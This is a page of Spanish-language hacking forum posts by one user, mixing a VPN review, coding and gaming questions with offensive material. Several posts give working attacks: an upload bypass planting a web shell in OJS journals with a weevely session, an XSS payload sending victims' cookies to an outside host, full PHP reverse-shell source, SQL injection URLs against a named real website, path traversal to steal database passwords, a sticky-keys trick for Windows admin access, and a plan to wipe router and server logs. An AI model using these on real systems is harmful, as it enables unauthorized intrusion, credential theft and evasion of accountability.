Temas

[proxy.sh]

Hacía mucho que no escribia nada (tanto que hasta olvide mi contraseña) y quería presentaros una herramienta, la cual considero realmente útil, barata y a estas alturas indispensable para cualquier persona que aprecie su privacidad. La herramienta en cuestión se llama proxy.sh, al contrario de lo que pueda parecer por su nombre proxy.sh es un sistema de servidores VPN que ofrece una serie de servicios por los cuales destaca.

En primer lugar proxy.sh tiene una política de privacidad extremadamente buena, en sus servidores sólo se almacena el correo electrónico que se les de durante el registro, esto quiere decir que no quedan registradas direcciones IP al conectarse a los servidores VPN ni al realizar el registro en su web, lo cual es un punto a favor, el único registro posible en el que puede aparecer la dirección IP es en el registro correspondiente al pago de sus mensualidades, el cual se realiza a traves de un tercero, y puede ser este tercero el que almacene tus datos.

En cuanto a la disposición de los pocos datos tuyos que tengan a terceros proxy.sh lo dice muy claro: "Usually we will not respond to demands from any third party, including governmental institutions". Sin embargo si que es cierto que realizan tres restricciones a esta regla, tus datos serán facilitados a terceros en caso de que estes acusado de pedofilia, daños a terceros y extremismos políticos o religiosos. Cabe destacar a estas alturas que a pesar de que todos los programas que hay en los servidores estan configurados para no dejar logs, ademas, estos corren en RAM con lo cual cada vez que se reinicia el servidor se pierden los posibles datos. (Si si en daños a terceros se incluye hacking, de echo hace poco hubo una noticia relaccionada con ellos que se puede leer en THN).

Cabe destacar de esta VPN que tiene su base en las islas Seychelles con lo cual como entidad jurídica no se ve sujeta a leyes tales como el acta patriótica que nos aleja un poco de las posibles interferencias de nuestras comunicaciones por parte de los EEUU (para los mas paranoicos).

Proxy.sh usa un sistema de cifrado RSA de 1024bits cuya contraseña cambia cada hora, como se puede leer en su página web en un sistema basado en OpenVPN-TCP:
"For encryption the cipher in use is CBC mode of Blowfish with encryption strength of 128bit, hash algorithm is 160bit SHA1, and the control channel is same TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA. Our 1024 bit RSA key is changing every hour, preventing most advanced hackers and covert teams part of governmental agencies from breaking through."

En definitiva para mi proxy.sh es una opción realmente buena y eficiente si lo que queremos es anonimizar nuestro acceso a internet ya que protege bastante mas que un proxy y de momento no depende de otros usuarios como la red TOR para garantizar el anonimato, evitando que usuarios malintencionados puedan realiazar un robo de información. Ofrece múltiples servidores y una web donde se puede ver en tiempo real el estado de los servidores y un mapa en el cual se puede observar la localización de los mismos. En cuanto al funcionamiento de la VPN no tiene ninguna novedad, funciona igual que el resto de VPNs.

En lo referente a los pagos para todos los que somos de la península es cierto que la tarifa mas barata es la de 10 dólares mensuales que ofrece un ancho de banda de hasta 200Gbps pero haciendo el cambio a euros es aproximadamente 7 euros con 40 centimos, un gasto bastante superfluo teniendo en cuenta los servicios que nos ofrece. Para toda la comunidad latinoamericana creo que pueden elegir la tarifa de 5 dolares mensuales que da, si no me equivoco, hasta 100Gbps de todos modos las diferencias entre las tarifas son mínimas y se pueden encontrar aquí, destacar tambien que soporta hasta 90 tipos de pagos.

Si hablamos de la configuración esta es realmente facil y dan soporte a multiples plataformas, entre las que podemos encontrar: linux, ios, android, blackberry, windows phone, apple, xbox 360, ps3, cisco, aix, oracle y dd-wrt. Aunque por supuesto para uso casero, en dispositivos fijos, siempre que tengamos soporte en el router para VPN lo mejor creo que es configurar nuestro ruter para que use VPN con lo que quedarian protegidos todos los sistemas conectados a esta red.

En especial recomiendo éste servicios para los usuarios de telefonía movil ya que protege los datos de posibles filtraciones en redes wifi públicas, es decir, si alguien intentase interceptar, por ejemplo con un man in the middle, el tráfico saliente de tu maquina se encontraría con un tráfico cifrado realmente dificl de descifrar. Tanto para android como para ios proxy.sh ofrece aplicaciones con las cuales se redireccionará el tráfico de tu movil hacia la VPN, ambas aplicaciones son realmente fáciles de configurar.

Por último decir que proxy.sh ofrece tutoriales y guías para configurar nuestros dispositivos de todas las maneras posibles, las diferentes guias se pueden encontrar en este enlace, en cuanto a las FAQs las podemos encontrar aquí además ofrecen un soporte a traves de un sistema de tickets que es realmente rápido y bastante amable, para contactar con ellos se puede acceder a este link.

Ademas proxy.sh ofrece la posibilidad de que establezcas alguno de sus servidores como nodo de salida de la red TOR lo cual incrementaria la anonimicidad de todas tus conexiones (ver manual aquí) o como nodo de entrada.



Preguntillas:

¿Que opinais sobre su política de privacidad?
¿Que opinais sobre las VPN, estoy en lo cierto y son la mejor manera de protegerse contra posibles mitm?
¿Combinariais VPN + TOR?¿Como nodo de salida o de entrada?
¿Que opinais del cifrado que ofrece proxy.sh?
¿Es realmente útil para el anonimato, o con PRISM estamos todos pringados?
¿Alguien ha encontrado algún otro servicio VPN con mejores prestaciones y menor o igual precio?


Ninguno de los enlaces anteriores debería de ser mi enlace de afiliado, si te ha gustado el producto, crees que es de utilidad y vas a contratar sus servicios puedes echarme una mano usando mi enlace de afiliado.

Articulo publicado siguiendo las normas estipuladas en CAREN v1.0.

Un saludo,
Søra.

Hola a todos,
bueno lo primero localizamos el sistema con la siguiente dork

Código [Seleccionar] Expandir

inurl:public/journals/1/
Buscamos la raiz por ejemplo:

Código [Seleccionar] Expandir

https://example.com/blah/lo/que/sea
Nos registramos y marcamos las tres casillas de ROL:
reader, author and reviewer...
creamos un artículo nuevo y usamos el uploader que hay para subir una portada para
nuestro articulo con extension pHp para bypassear el uploader o bien usamos live http headers
vamos a /public/journals/1/ y alli encontraremos nuestra shellcode renombrada a algo como:
cover_article_47_en_US.pHp
Voila!

PD: hasta la version 2.3.6 se puede hacer el upload con un submission en vez de con una portada, sinembargo esta suele estar parcheada.

https://www.htbridge.com/advisory/HTB23079

Código [Seleccionar] Expandir

weevely http://mihost/public/journals/12/cover_article_21_en_US.pHp myshellpass
      ________                      __
     |  |  |  |-----.----.-.--.----'  |--.--.
     |  |  |  |  -__| -__| |  | -__|  |  |  |
     |________|_____|____|___/|____|__|___  | v1.0
                                      |_____|
              Stealth tiny web shell

[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.

[shell.php] [!] Error: No response
apache@:/var/www/html/public/journals/12 $ id
uid=48(apache) gid=48(apache) grupos=48(apache),100(users)
apache@:/var/www/html/public/journals/12 $ uname
Linux
apache@:/var/www/html/public/journals/12 $
[!] Exiting. Bye ^^

Buenas a todos, como indica el título estoy teniendo bastantes problemas a la hora de desarrollar un pequeño cifrador de texto en ROOT13, no son errores sintácticos ya que el compilador no em dice nada asi que supongo que son errores lógicos a ver si alguien me puede echar un cable.

Código (Java) [Seleccionar] Expandir


import java.util.Scanner;

public class ArraysFor {

public static void main(String[] args) {

char[] abecedario={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','ñ','o','p','q','r','s','t','u','v','w','x','y','z'};
System.out.println("Introduce el numero de caracteres a cifrar en ROOT13");
Scanner scann = new Scanner (System.in);
int maximo = scann.nextInt();
char letra[];
letra = new char[maximo];

for (int k=0; k<maximo; k++) {

letra[k] = scann.next().charAt(0);

}

for (int i=0; i<maximo; i++) {

for (int j=0; j<27; j++) {

if (letra[i] == abecedario[j]) {

int x=0;
x = j + 13;

    if (x>27) {
   
    x = x - 27;
   
    letra[i]=abecedario[x]; }
   
    else {
   
    letra[i]=abecedario[x]; }
   
                }
}
}

for (int g=0; g<maximo; g++){
System.out.println(letra[g]);
}
}

}

Bueno ese es el código lo que queria era cifrar los caracteres de manera que pasaran a ser los que se encuentran 13 posiciones mas a la derecha en el abecedario pero como se puede comprobar cuando ejecutamos el programa no todos los caracteres quedan bien cifdrados, lo raro es que para mi sorpresa hay algunos que si.

Un saludo y espero su ayuda.

Supongamos que yo quisiera hacer un hipotético ataque hacia un hipotético servidor que hipotéticamente hablando no sea mio (digamos que ha sido un prefacio exculpatorio). Y mi objetivo como no es pasar desapercibido coger la información e irme o simplemente controlar el servidor, mi pregunta es: ¿El método que desarrollaré a continuación es completamente anónimo?

1- Salgo de mi casa, me acerco a un McDonald, me siento en un bar cercano pido una Coca-Cola. Me conecto a la red del McDonald y procedo.

2- Enciendo ettercap y wireshark miro quién está conectado y observo que todas las conexiones sean completamente normales.

3- Saco la contraseña del router, la cual confío sea por defecto para no tener que usar fuerza bruta, y accedo a la puerta de enlace del router.

4- Cambio la configuración para que deje de registrar "eventos" y borro los registrados hasta ahora.

5- Con ayuda de TOR y proxychains anonimizo mis probatinas y finalmente si todo va bien la intrusión.

6- Accedo al servidor y posteriormente intento conseguir una terminal con permisos de administrador, mediante explotación del kernel u otros, ahora hay dos opciones:

6.1- Si la consigo accedo a los logs y borro toda mi información, programo un script de autoborrado de logs o simplemente lo hago yo manualmente, ahora ya puedo acceder desde mi casa con total confianza y seguridad ya que los logs pueden ser borrados.

6.2- Si no consigo la cuenta de administrador mantengo el mismo método cada vez que quiera acceder a este servidor o bien envío la información a través de otro servidor al que haya accedido con anterioridad y tenga permisos de administrador.

Bueno creo que el método es 100% seguro y que ni siquiera haría falta usar TOR si estas desde un McDonald pero en el hipotético caso de que existiera intención de encontrarme o no hubiera borrado bien todos los logs tendrían que pedir los hipotéticos interesados una orden judicial lo que me daría más tiempo.

Si añado ademas que el sistema operativo(BackTrack) con todos los datos están en un pendrive por mayor seguridad queda precioso.

Al principio esto iba a ser un artículo solo de pregunta pero me he dado cuenta que con un par de enlaces quizás podía ayudar a alguien así que espero que os sirva y si me he liado en algo decírmelo sin preocupaciones.

Un saludo Mr. Paranoias digo.... Sora

Haber gentecilla hace ya mucho que no me pasaba por aqui y ahora tengo muchas dudas y no se como solucionarlas a ve si alguien me echa una mano...

PRIMERO:

Estoy llevando un pentest hacia una web y he encontrado un uploader sin filtros he subido una shell modificada para tener un aspecto mas amigable pero no he encontrado la ruta donde se envian los archivos, en mi busqueda he encontrado tambien una FPD(Full Path Disclosure) pero obvio que no muestra la ruta de la shell, tambien he encontrado una SQL injection pero tampoco me vale para nada ya que no hay ni siquiera un panel de contenidos, no al total del servidor.

SEGUNDA:

Realizando otro pentest he encontrado una XSS no persistente os paso la inyeccion a ver si lo hago bien esque es la primera que hago :S el buscador no tiene filtros ni nada y al realizar una busqueda aparece:

Código (htm) [Seleccionar] Expandir

<li><span class="totalpaginas">Resultados para mibusqueda</span></li>

y la url queda asi:

http://www.idomain.com/buscador/results?title=mibusqueda

Asi que la url que e preparado es esta:

www.idomain.com/buscador/results?title=</span></li><script>window.location='http://miweb/ckie.php='+document.cookie</script>

supongo que bastante simple no? pero bueno am y tengo otra duda respecto a esto necesitaria luego redireccionar al administrador a la web que quiera eso en JS como se haria?

TERCERO:

Tengo una shell inversa en php con este programa:

Código (php) [Seleccionar] Expandir

<?php

/*********************

@@author : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email : lionaneesh@gmail.com

********************/


ini_set('max_execution_time',0);

?>

<html>
<head>
    <title>Back Connect Shell -- PHP</title>
</head>

<body>

<h1>Welcome to Back Connect Control Panel </h1>

<p> Fill in the form Below to Start the Back Connect Service </p>

<?php
if( isset($_GET['port']) &&
    isset($_GET['ip']) &&
    $_GET['port'] != "" &&
    $_GET['ip'] != ""
    )
    {
        echo "<p>The Program is now trying to connect!</p>";
        $ip = $_GET['ip'];
        $port=$_GET['port'];
        $sockfd=fsockopen($ip , $port , $errno, $errstr );
        if($errno != 0)
        {
            echo "<font color='red'><b>$errno</b> : $errstr</font>";
        }
        else if (!$sockfd)
        {
               $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
        }
        else
        {
            fputs ($sockfd ,
            "\n=================================================================\n
            Back Connect in PHP\n
            Coded by lionaneesh\n
            @@author : lionaneesh
            @@facebook : facebook.com/lionaneesh
            @@Email : lionaneesh@gmail.com
            \n=================================================================");
         $pwd = shell_exec("pwd");
         $sysinfo = shell_exec("uname -a");
         $id = shell_exec("id");
         $dateAndTime = shell_exec("time /t & date /T");
         $len = 1337;
         fputs($sockfd ,$sysinfo . "\n" );
         fputs($sockfd ,$pwd . "\n" );
         fputs($sockfd ,$id ."\n\n" );
         fputs($sockfd ,$dateAndTime."\n\n" );
         while(!feof($sockfd))
         { 
            $cmdPrompt ="(Shell)[$]> ";
            fputs ($sockfd , $cmdPrompt );
            $command= fgets($sockfd, $len);
            fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
         }
         fclose($sockfd);
        }
    }
    else
    {
    ?>
    <table align="center" >
         <form method="GET">
         <td>
            <table style="border-spacing: 6px;">
                <tr>
                    <td>Port</td>
                    <td>
                        <input style="width: 200px;" name="port" value="31337" />
                    </td>
                </tr>
                <tr>
                    <td>IP </td>
                    <td><input style="width: 100px;" name="ip" size='5' value="127.0.0.1"/>
                </tr>
                <tr>
                <td>
                <input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/>
                </td>
                </tr>   
                   
            </table>
         </td>
         </form>
    </tr>
    </table>
    <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
    }
?>

El problema es que a pesar de el uso de varios exploits para intentar escalar privilegios no consigo la shell de root la maquina es ubuntu y el kernel:

2.6.28.8-20120119a-iscsi-ntacker-3ware-amd-sec8-ram64-grsec

bueno a pesar de la busqueda exahustiva por google no consigo nada asiqeu a ver si me podeis echar una manita un saludo chicos!!!!

Hola a todos estoy probando las SQLi  ya que no lo habia echo nunca y tengo una duda he encontrado una pagina vulnerable y ya e sacado el numero de columnas la que es vulnerable pero al pedir la lista de tablas no consigo que me la de entera, siempre me corta la lista, he probado concat(table_name), group_concat(table_name) he probado con limites peor nose... alguna idea?

Esta es la url que e probado:

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

Un saludo

Hola amigos me pase por aqui a ver si me podian solucionar una duda que me ha surgido..
veran estoy prbando  la web de un amigo y para su desgracia e encontrado esto:

..../descargar.php?=/var/www/.... he probado y efectivamente tengo acceso hasta la raiz del servidor.. eso si a la carpeta root nada de nada.. he encontrado la contraseña del phpmyadmin y he descargado el archivo qe la contiene ahora bien no consigo localizar el phpmyadmin para loguearme, he usado un bruteador de directorios como el intellitamper pero nada de nada voy completamente a ciegas.. ustedes que em recomiendan...

Un saludo

Ola a todos voy a comprarme un ordenador de sobremesa nuevo y no se que comprar que so parece esto:


http://www.appinformatica.com/ordenadores-marca-pbell.-imedia-i4620-sp-ci3-2100-6gb-1tb-nvidia-1gb.php

Pantalla:

http://www.appinformatica.com/monitores-lg.-e2441v-24--5000000-1-5ms--dvi-hdmi-wide.php

Espero sus opiniones y recomendaciones...

Ola a todos nunca me habia interesado por el tipo de ataque SQLi pero hacia mucho que no trataba con la informatica y e decidido empezar por ahi esta vez. He llegado a esto:

http://www.feldgrau.com/search.php?ID=1%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6+from+information_schema.tables--

Se que no se suele poner la pagina que de verdad estas atacando pero si no lo pongo no tiene sentido mi pregunta... mi pregunta es: ¿Que columna puede ser la que contenga los datos interesantes (contrasueña/nombre de usuario)?

He revisado varias de ellas y por ejemplo al poner:

.php?ID=1+and+1=0+union+all+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=char(KEY_COLUMN_USAGE en ASCII)--

Me muestra que las columnas son KEY_COLUMN_USAGE repetidas veces y al pedir que me de el contenido de las columnas no pone nada...

No se si he usado la terminologia correcta, seguramente no pero espero que hayan entendido mi duda y alguien me pueda ayudar.

Perdon de nuevo por poner la url real pero esto es meramente didactico y espero no encontrarme la pagina defaceada!

Un saludo Søra

Hola a todos, antes de que piensen mal de mi es la 12ava vez que instalo el counter siguiendo manuales diferentes y lo he intentado todo pero visto lo visto e llegado a la conclusion de que igual el problema esta en ATI porque por lo que he leido con nVidea el counter no da problemas. La instalacion genial ni un solo problema instalo Steam descargo el Counter Strike Source y cuando ejecuto:

Código [Seleccionar] Expandir

wine "C:/Archivos de programa/Steam/Steam.exe" -applaunch 240 -console -add -tickrate 100 -gl nosync

Código [Seleccionar] Expandir

-console -add -tickrate 100 -gl nosync
fixme:process:SetProcessShutdownParameters (00000100, 00000000): partial stub.
fixme:urlmon:CoInternetSetFeatureEnabled 5, 0x00000002, 1, stub
fixme:urlmon:CoInternetSetFeatureEnabled 10, 0x00000002, 1, stub
fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot
fixme:toolhelp:Heap32ListFirst : stub
fixme:mixer:ALSA_MixerInit No master control found on HDA ATI HDMI, disabling mixer
err:ole:CoGetClassObject class {77f10cf0-3db5-4966-b520-b7c54fd35ed6} not registered
err:ole:CoGetClassObject no class object {77f10cf0-3db5-4966-b520-b7c54fd35ed6} could be created for context 0x1
fixme:wbemprox:wbem_locator_ConnectServer 0x20ba90, L"ROOT\\CIMV2", (null), (null), (null), 0x00000080, (null), (nil), 0x41ebe50)
fixme:winhttp:WinHttpGetIEProxyConfigForCurrentUser returning no proxy used
fixme:win:EnumDisplayDevicesW ((null),0,0x32c584,0x00000000), stub!
fixme:advapi:RegisterTraceGuidsW (0x38c5290, 0x3f1b738, {3dada31d-19ef-4dc1-b345-037927193422}, 1, 0x3ef3b24, (null), (null), 0x3f1b750,)
err:ole:RevokeDragDrop invalid hwnd (nil)
err:ole:RevokeDragDrop invalid hwnd 0x10138
fixme:win:EnumDisplayDevicesW ((null),0,0x33e1e4,0x00000000), stub!
err:module:import_dll Library binkw32.dll (which is needed by L"C:\\archivos de programa\\steam\\steamapps\\micuenta\\counter-strike source\\bin\\video_bink.dll") not found
err:module:import_dll Library binkw32.dll (which is needed by L"C:\\Archivos de programa\\Steam\\SteamApps\\micuenta\\counter-strike source\\bin\\video_bink.dll") not found
Using breakpad crash handler
Setting breakpad minidump AppID = 240
Forcing breakpad minidump interfaces to load
Looking up breakpad interfaces from steamclient
Calling BreakpadMiniDumpSystemInit
Looking up breakpad interfaces from steamclient
Calling BreakpadMiniDumpSystemInit
Steam_SetMinidumpSteamID:  Caching Steam ID:  76561197990589403 [API loaded yes]
Steam_SetMinidumpSteamID:  Setting Steam ID:  76561197990589403
fixme:keyboard:X11DRV_LoadKeyboardLayout L"00000409", 0000: stub!
fixme:d3d:debug_d3dformat Unrecognized 0x34324644 (as fourcc: DF24) WINED3DFORMAT!
fixme:d3d:wined3d_get_format Can't find format unrecognized (0x34324644) in the format lookup table
fixme:d3d:debug_d3dformat Unrecognized 0x36314644 (as fourcc: DF16) WINED3DFORMAT!
fixme:d3d:wined3d_get_format Can't find format unrecognized (0x36314644) in the format lookup table
fixme:d3d:debug_d3dformat Unrecognized 0x34324644 (as fourcc: DF24) WINED3DFORMAT!
fixme:d3d:wined3d_get_format Can't find format unrecognized (0x34324644) in the format lookup table
fixme:d3d:debug_d3dformat Unrecognized 0x34324644 (as fourcc: DF24) WINED3DFORMAT!
fixme:d3d:wined3d_get_format Can't find format unrecognized (0x34324644) in the format lookup table
fixme:d3d:debug_d3dformat Unrecognized 0x36314644 (as fourcc: DF16) WINED3DFORMAT!
fixme:d3d:wined3d_get_format Can't find format unrecognized (0x36314644) in the format lookup table
fixme:d3d:debug_d3dformat Unrecognized 0x34324644 (as fourcc: DF24) WINED3DFORMAT!
fixme:d3d:wined3d_get_format Can't find format unrecognized (0x34324644) in the format lookup table
fixme:ole:CoInitializeSecurity ((nil),-1,(nil),(nil),0,3,(nil),0,(nil)) - stub!
fixme:wbemprox:wbem_locator_ConnectServer 0x179db8, L"ROOT\\CIMV2", (null), (null), (null), 0x00000000, (null), (nil), 0x33e114)
fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
fixme:dbghelp:elf_search_auxv can't find symbol in module
err:ntdll:RtlpWaitForCriticalSection section 0x7d77f4 "?" wait timed out in thread 0028, blocked by 0029, retrying (60 sec)
fixme:winhttp:WinHttpGetIEProxyConfigForCurrentUser returning no proxy used
fixme:appbar:SHAppBarMessage unknown msg: 4
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETSTATE): stub
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETAUTOHIDEBAR, hwnd=(nil), edge=3): stub
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETAUTOHIDEBAR, hwnd=(nil), edge=1): stub
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETAUTOHIDEBAR, hwnd=(nil), edge=0): stub
fixme:appbar:handle_appbarmessage SHAppBarMessage(ABM_GETAUTOHIDEBAR, hwnd=(nil), edge=2): stub
err:ole:RevokeDragDrop invalid hwnd (nil)
err:ole:RevokeDragDrop invalid hwnd 0x2015e


y ahi se queda calado sin hacer nada.. :S la aceleracion 3D se supone que si la tengo:

Código [Seleccionar] Expandir

-laptop:/$ glxinfo | grep rendering
direct rendering: Yes


Si necesitais alguna otra informacion pedidla yo ya no se como hacer que funcione... uso Ubuntu 9.10 (karmic koala).

Espero vuestra ayuda!

PD: Tengo el WoW que si que me funciona y el Sparta-la batalla de las termopilas que tambien funciona..

Me he descargado los paquetes necesarios para que desde el gestor de redes de mi ubuntu 9.10 pueda configurar VPN's sin embargo me e puesto a ver que conseguia y no consigo nada no tengo ni idea, he buscado por google y demas y no me sale nada o lo que sale no funciona. Quiero acer una VPN a:

Este IRC

Cuando le doy a añadir vpn me sale: PPTP, openVPN o VPNC elija cual elija no consigo que funcione... si alguien me puede ayudar estaria muy agradecido.

Ola a todos he intentado hacer un codigo que cifre un archivo en root 13 y el gcc me da error solo 1 no e logrado solucionar.

Código (C) [Seleccionar] Expandir

#include <stdio.h>
#define root 13
main() {
printf("¿Número de carácteres?\n");
int num;
scanf("%i",&num);
char vector[num];
int c;
FILE *comprob;
comprob = fopen("archivo.txt","rb");
if (comprob==NULL) {
printf("No existe el archivo\n"); }
else {
int i;
for (i=0; i<num; i++) {
          c = fgetc(comprob);
          vector[i]=c;}

vector[i] = '\0';
fclose(comprob);
int a,b;

char z,buffer2[58],buffer3[10000];
buffer2 = *"abcdefghijklmnñopqrstuvwxyz1234567890¿?()/&%$·!¡-.,;: ><*+";
for (a=0; a<num; a++) {
        for (b=0; b<58; b++) {
            if (vector[a]==buffer2[b]) {
                    z = a + root;
                    buffer3[a] = buffer2[z]; }}}}
             return 0;}

el error del gcc es:

Código [Seleccionar] Expandir

codesC# gcc cifrador.c
cifrador.c: In function 'main':
cifrador.c:24: error: incompatible types when assigning to type 'char[58]' from type 'char'


Código (C) [Seleccionar] Expandir

#include <stdio.h>
main() {
printf("¿Número de carácteres?\n");
int num;
scanf("%i\n",&num);
char vector[num];
int c;
FILE *comprob;
comprob = fopen("archivo.txt","rb");
if (comprob==NULL) {
printf("No existe el archivo\n"); }
else {
int i;
for (i=0; i<num; i++) {
          c = fgetc(comprob);
          vector[i]=c;}

vector[i] = '\0';
fclose(comprob);
int a;
for (a=0; a<num; a++) {
          printf("%c",vector[a]);} }
exit 0;}

No da errores al compilar pero no muestra lo que contiene el archivo ¿ Por que ?

¿Que piensa estados unidos de tu pais?

http://213.251.145.96/classification/3_0.html

WIKILEAKS!! Hay mucho interesante

Pues eso que si algun zaragozano se vien al hacklab q yo nunca e ido algun userdel foro se viene con migo por no ir solo.... 

Esta en paseo san blas  la web http://downgrade.hacklabs.org/ todo sale en la web...




Saludos Søra

Veran uso linux i686 mas concretamente ubuntu karmik koala y tengo un problema que al intentar ejecutar el archivo dolphin-emu me suelta esto:

Código [Seleccionar] Expandir

Binary/Linux-i686# ./dolphin-emu
./dolphin-emu: relocation error: ./dolphin-emu: symbol _ZN12wxAuiToolBar12ms_classInfoE, version WXU_2.8.9 not defined in file libwx_gtk2u_aui-2.8.so.0 with link time reference

He buscado el paquete libwx y lo tengo instalado asi q no se me ocurre nada...

Tengo instalado el libwxgtk2.8-0......


Saludos Søra

[Nota de Ariath]

Ola no me paso mucho por aqui pero a ver si alguien me puede buscar enlaces de desscarga del juego Kingdom Under Fire 2 el 1 lo juge y es basura pero el 2!!! es increible:

[youtube=425,350]http://www.youtube.com/watch?v=Aiixi3prki4[/youtube]

Simplemente IM-PRE-SIO-NAN-TE




Saludos Søra

Nota de Ariath: He modificado el título porque cualquiera que vea kufii no va a saber de qué estás hablando.

Y de paso, indica que estás buscando enlaces, que parece que busques ayuda real con el juego .

Bueno que os puedo decir a los que jugas al rugby sabeis lo que se siente y a los que no es unico indescriptible es hermandad rabia fuerza compañerismo lo es todo. Asi que aqui os dejo unos poqitos videos.

Alg de cultura:

http://www.vimeo.com/5642455

Y ahora un par de videos que de verdad intentan explicar como se siente el rugby aunq como ya he dicho queda muy lejos de lo que uno siente:

[youtube=425,350]
http://www.youtube.com/watch?v=_f99m1Qjluc[/youtube]

[youtube=425,350]http://www.youtube.com/watch?v=T6bo6yalDcA[/youtube]

[youtube=425,350]http://www.youtube.com/watch?v=REKOxNbCIek&feature=fvw[/youtube]

Bueno y os dejo con algo asi graciosillo pero real:

[youtube=425,350]
http://www.youtube.com/watch?v=knG9Gar84oo[/youtube]

Nada a ver si esto os cambia la opinion del rugby en serio veanse los videos merece mucho la pena...




Saludos Søra

Ola a todos hoy vengo "creo" con un tema interesante.

Una central de telefonos es un edificio en el cual esta la infrestructura para realizar/recibir llamadas y para que nosotros tengamos nuestro preciado internet tiene un conmutador donde se dirigen las llamadas y se conectan los telefonos, un repartidor que nos envia el adsl etc...

Mi pregunta es como se lleva a cabo un ataque a una centralita sin llegar a tener acceso fisico, yo puedo subir hasta la centralita mas cercana entrar y moverme como quiera o hay personas de mantenimiento (tener en cuenta que vivo en una zona rural y la centralita solo atiende a un pueblo) eso sin contar que salta la alarma.

Porque lo que yo estaba pensando es si desde cerca de la centralita con un ordenador se podria hacer algo o necesitaria un equipo especial... otra duda como se de que ISP es la centralita de momento lo unico que se es que presta servicio a 128 lineas soporta ADSL y ADSL2 tiene una velocidad de 3mbps y no admite mas de 4mbps y porque todo eso sale aqui.

Bueno pues esas son mis dudas de hoy. A ver si alguien me lo puede contestar.. Iba a ponerlo en redes pero he pensado esto esta orientado a hacking asi que aqui lo dejo pero vamos moderadores decidan.



Saludos Søra


edito: Por supuesto que he buscado en google pero cosas asi no encuentro si alguien encuentra temas de este tipo en google que me pase en enlace y me diga como lo hace  

Este es mi problema proxychains me funciona pero con este error delante mi duda es: el error es pasable vamos que no afecta al trabajo de proxychains o lo tengo que solucionar...

Código [Seleccionar] Expandir


Escritorio/proxychains/proxychains# ./proxychains nmap -sS -sV -PN iesitaza.educa.aragon.es
ProxyChains-3.1 (http://proxychains.sf.net)
ERROR: ld.so: object 'libproxychains.so' from LD_PRELOAD cannot be preloaded: ignored.

Starting Nmap 5.00 ( http://nmap.org ) at 2010-07-05 13:50 CEST

El scanner continua normalmente.....



Saludos Søra

Ola a todos estoi intentando correr el tekken 5 con el pcsx2 pero despues del juego de las navecitas cuando le doy a start se me queda la pantalla en negro y no avanza.

Tengo activado FPU clamp hack para tekken 5
tambien el multi threaded

y las caracteristicas de mi PC son:

Cpu Vendor: GenuineIntel
Familly: Intel(R) Core(TM)2 Duo CPU T5800 @ 2.00GHz
Cpu Speed: 2002MHZ
Features: MMX,SSE,SSE2,SSE3,x86-64

si necesitais algo mas avisadme sin dudarlo. Espero su ayuda..


Saludos Søra


EDITO:

la terminal me da esto mientras que la pantalla esta en negro:

cpuTlbMiss pc:249f38, cycl:154ce506, addr: 1d26c154, status=70030c13, code=8

vtlb miss : addr 0x1D26C15E, mode 0

Me estraño mucho no ver este manual por el foro, igual si que esta y no me he dado cuenta pero bueno, no sabia si ponerlo en hacking o en windows pero como soy mas aficionado al subforo de hacking pues lo dejo aqui.

Este tuto va para tod@s aquell@s que sus padres, jefes, profesores etc.. les dan una maldita cuenta de invitado y ellos se ponen la de administrador con pass. Con este tuto siguiendo unos pocos pasos y aprovechando una aplicacion de windows podremos crear una cuenta de admin y mucho mas sin tener privilegios....

1. El primer paso consiste en ir a la pantalla de login una vez alli pulsa 5 veces la tecla shift si te aparece una ventana que pone algo tipo stykkeys, es que el sistema es "vulnerable".

2.Reinicia el ordenador y mientras arranca pulsa F8 te saldra la pantalla negra de windows con varias opciones, presiona sobre iniciar con simbolo del sistema.

3.Una vez en la pantalla MS-DOS introduce estos comandos:

Código [Seleccionar] Expandir


cd..
cd windows
cd system32
copy sethc.exe sethc_backup.exe
copy cmd.exe sethc.exe

Si os pide sustituir archivo poned que si... ahora reiniciais la PC y os quedais en la pantalla de loguin.

4.Vuelve a pulsar 5 veces ell shift y vuala se abrio la cmd con privilegios de administrador aora introduce:

Código [Seleccionar] Expandir

compmgmt.msc

Y se abrira una pantalla y ya esta, ya podras crear un user con privilegios de admin o borrar una cuenta lo que tu quieras.....

Bueno este es un metodo seguro que hay mas, esta testeado por mi en win XP y anteriores solo que no se si en Vista o Windows 7 funciona. Si alguien me lo puede corroborar.


Saludos Søra

Ola a todos buscando como traducir un codigo en C a ASM e encontrado un programa llamado NASM y a pesar del manual que e puesto en el enlace sigo sin saber como hacerlo e buscado por internet y no hay ningun programa y l necesito muuucho.

